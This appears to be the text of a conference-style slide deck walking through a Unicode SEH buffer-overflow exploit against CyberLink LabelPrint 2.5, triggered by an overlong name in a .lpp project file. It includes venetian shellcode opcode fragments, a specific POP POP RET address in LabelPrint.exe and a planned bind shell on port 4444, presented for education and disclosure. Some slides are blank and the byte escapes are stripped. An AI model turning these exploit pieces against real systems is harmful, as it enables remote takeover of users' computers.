  • 2. Who?  Thomas Gregory - @modpr0be  IT Security consultant @Spentera  Security researcher (occasionally)  focus on Windows exploitation  IT Security trainer (sometimes)  f3ci - ????  Security researcher  Penetration tester, red team  Appsec & simple exploit dev
  • 3. What?  CyberLink LabelPrint 2.5  Labeling software  Embedded by default in CyberLink Power2Go installation.  Included as bloatware in all Lenovo, HP, Asus laptops somewhere between 2015-2016.
  • 4. Why?  The exploit development is quite challenging and interesting  We want to share it for education purposes only.
  • 6. Fuzzing possibility  File Input  import  open media  open project  Registry overflow
  • 7. Tools  Immunity Debugger  with mona plugin  Editor/IDE  /me using sublime text
  • 8. LabelPrint Project  Project file with extension .lpp  Header <PROJECT version="1.0.00"> <INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017"> <TRACK name=“” />
  • 9. The Bug  In the name parameter, inside the TRACK tag <PROJECT version="1.0.00"> <INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017"> <TRACK name="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA” /> </INFORMATION> </PROJECT>
  • 11. Unicode Based  AA or 4141 will be .A.A or 00410041
  • 12. What is SEH?  a piece of code that is written inside an application, with the purpose of dealing with the fact that the application throws an exception (taken from corelan)  an exception is an event, which occurs during the execution of a program, that disrupts the normal flow of the program's instructions.  a catcher, who is trying to catch unusual behavior.
  • 13. What is SEH? This structure ( also called a SEH record) is 8 bytes and has 2 (4 bytes) elements :  a pointer to the next exception registration structure (in essence, to the next SEH record, in case the current handler is unable the handle the exception)  a pointer, the address of the actual code of the exception handler. (SE Handler)
  • 14. Abusing SEH In other words, the payload must do the following things:  Cause an exception. Without an exception, the SEH handler (the one you have overwritten/control) won’t kick in.  Overwrite the pointer to the next SEH record with some jumpcode (so it can jump to the shellcode)  Overwrite the SE handler with a pointer to an instruction that will bring you back to next SEH and execute the jumpcode.  The shellcode should be directly after the overwritten SE Handler. Some small jumpcode contained in the overwritten “pointer to next SEH record” will jump to it).
  • 15. Abusing SEH  When the exception occurred, the position on the stack will going like this:  Possible value to overwrite SE Handler are POP something, POP something and RETN to the stack.  It will POP address that sit at the top of the stack, POP it again to take the second address, and RETN to execute the third address (which is now at the top of the stack)  The third address usually our supplied input buffer Top of stack Our pointer to next SEH address
  • 16. Abusing SEH Image was taken from http://corelan.be with permission from Peter van Eeckhoutte (Corelan)
  • 17. Unicode?  Unicode allows us to visually represent and/or manipulate text in most of the systems across the world in a consistent manner.  Unicode based exploit usually involved in  file/folder naming  part of input parameter that will deal with naming
  • 18. More Info  Structured Exception Handler (SEH)  https://msdn.microsoft.com/en- us/library/windows/desktop/ms680657(v=vs.85).aspx  https://www.corelan.be/index.php/2009/07/25/writi ng-buffer-overflow-exploits-a-quick-and-basic- tutorial-part-3-seh/  https://blog.spentera.com/2011/09/14/seh-based- stack-overflow-the-basic/  Unicode based exploit  https://www.corelan.be/index.php/2009/11/06/expl oit-writing-tutorial-part-7-unicode-from-0x00410041- to-calc/
  • 19. SEH + Unicode = Venetian PROBABLY THE MOST HATED COMBINATION
  • 20. Venetian Shellcode  One of the registers must point at the beginning of the shellcode.  One register must point at a memory location that is writeable (and where it’s ok to write the new reassembled shellcode)  Normal venetian prepend shellcode  Push another register to stack (ESP)  Pop stack (ESP) into EAX  Align the EAX register with add/sub instruction  Push EAX register into stack (ESP)  RET (return to the beginning of shellcode at EAX)  Sadly, we won’t face a normal venetian approach
  • 21. Typical Venetian Unicode Prepend Opcode Align EAX Register •If we use EAX as BufferRegister, we need to align EAX to point to our Buffer “Stack Walking” •Walk over the Next SEH and SEH. RET to Shellcode • Shellcode executed
  • 22. Typical Venetian Unicode Prepend Opcode ven = "x56" #push esi ven += "x41" #align ven += "x58" #pop eax ven += "x41" #align ven += "x05x04x01" #add eax,01000400 ven += "x41" #align ven += "x2dx01x01" #add eax,01000100 ven += "x41" #align ven += "x50" #push eax ven += "x41" #align ven += "xc3" #ret Depends on where our buffer is. Use EAX as a BufferRegister
  • 23. Problem?  Limited instruction (because of Unicode)  need to find POP POP RET with Unicode friendly  All hex value between 0x80 – 0xFF are marked as bad  Yes, RET opcode (C3) is also included in the bad character list.  Meanwhile, our venetian shellcode need RET  Typical Venetian
  • 24. Sh*t!
  • 25. Solution  Find a proper Unicode friendly PPR (pop pop ret) instructions address somewhere in the library or executable  Create “our version” of RET  Fill the stack (ESP) with our shellcode  Pointing our RET to CALL ESP instruction address  This will alter the flow of execution.  EAX must be pointing to the beginning of our shellcode.  “Stack walk” until we meet shellcode.
  • 26. Our Venetian Unicode Shellcode Align EAX Register Calculate where RET will be placed Construct RET in EAX Calculate EAX for CALL ESP Opcode Reaching RET, Execute CALL ESP Re-aligning EAX “Stack walk” to Shellcode Bind shell 4444
  • 27. pop pop ret  !mona seh  Fortunately, we found one address that is an Unicode friendly (0x0044002c) in the main program (LabelPrint.exe)
  • 28. Construct RET (1)  Calculate the value of EAX register, preparing the address where we exactly want the decoded RET being placed later in the stack.  Limited calculation (because of UNICODE)  Zeroing the EAX register first  xor eax,eax
  • 29. Construct RET (2) Preparing address to push our RET:  push esp  pop eax  and EAX register with 01001B00  and EAX register with 01000100  push EAX  pop ESP ven += "x42" #nop ven += "x54" #push esp ven += "x42" #nop ven += "x58" #pop eax ven += "x42" #nop ven += "x05x1Bx01" #add eax 01001B00 ven += "x42" #nop ven += "x2dx01x01" #sub eax 01001000 ven += "x42" #nop ven += "x50" #push eax ven += "x42" #nop ven += "x5c" #pop esp
  • 30. Construct RET (3)  After the calculation in EAX, now the stack (ESP) will be pointing at 0x0012F655 (the same value as EAX)  This is important for our RET decoding address later.
  • 32. Zeroing Out EAX  We need to clear the EAX register for the next calculation of the RET opcode.  After EAX is zeroed out we can calculate the EAX register to meet 0xC300C300 (RET opcode).  We can perform the calculation with AND operand :  AND EAX register with 7e007e00  AND EAX register with 01000100
  • 33. Zeroing Out EAX ven += "x42" #nop ven += "x25x7ex7e" #and eax,7e007e00 ven += "x42" #nop ven += "x25x01x01" #and eax,01000100
  • 34. Construct RET (5) Preparing RET opcode:  Zeroing Out EAX first (done)  XOR EAX register with 7f007f00  ADD EAX register with 44004400  PUSH EDI  PUSH EAX
  • 35. The RET Opcode (1) ven += "x35x7fx7f" #xor eax,7f007f00 ven += "x42" #nop ven += "x05x44x44" #add eax,44004400 ven += "x42" #nop ven += "x57" #push edi/padding ven += "x42" #nop ven += "x50" #push eax
  • 37. Construct CALL to ESP (1)
  • 38. Construct CALL to ESP (2)
  • 39. Construct CALL to ESP (3)
  • 40. Stack Walk to Shellcode
  • 41. Our Venetian Shellcode ven += "x58" #pop eax ven += "x42" #nop ven += "x58" #pop eax ven += "x42" #nop ven += "x05x10x01" #add eax, 11001900, align eax to our buffer ven += "x42" #nop ven += "x2dx0ex01" #add eax, 11001800, align eax to our buffer ven += "x42" #nop ven += "x50" #push eax ven += "x42" #nop ven += "x5C" #pop esp ven += "x42" #nop ven += "x58" #pop eax ven += "x42" #nop ven += "x05x53x7c" #add eax 7c005300 part of call esp ven += "x42" #nop ven += "x50" #push eax ven += "x42" * 68 #padding to fill the stack ven += "x7bx32" #part of call esp
  • 43. Solution  For now, do not user CyberLink Label Print.